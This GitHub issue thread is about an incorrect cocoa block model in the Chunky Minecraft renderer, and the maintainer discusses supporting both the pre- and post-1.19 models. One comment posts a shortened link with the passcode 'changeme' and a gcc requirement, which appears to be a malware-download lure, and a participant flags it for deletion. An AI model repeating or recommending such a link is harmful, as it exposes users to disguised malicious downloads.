### ISSUE TITLE
The cocoa model is incorrect.

### ISSUE THREAD

**Issue by Peregrine05** [chunky-dev/chunky#1761]
As shown in the following screenshot, the cocoa model is incorrect.
![image](https://github.com/user-attachments/assets/2ba84b8b-ccac-4938-801a-08b86f44ae11)

This issue is also present in 2.4.6, but it manifests differently (note the double border on the outer edge, and the lack of a border on the inner edge.)
![image](https://github.com/user-attachments/assets/8645cf82-dac5-4cf7-bc63-f3a6c5f05b7c)

**Comment by OldSnailCPP** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by Peregrine05** [comment]
Chunky runs on Java, so a gcc compiler won't fix the issue.

**Comment by Peregrine05** [comment]
@leMaik You should delete that message.

**Comment by leMaik** [comment]
The model changed in Minecraft 1.19 (22w11a). Currently Chunky only supports the old model, I can update it to only support the new model.

Do you have an idea on how to handle both? Old resource packs only support the old model and vice versa.
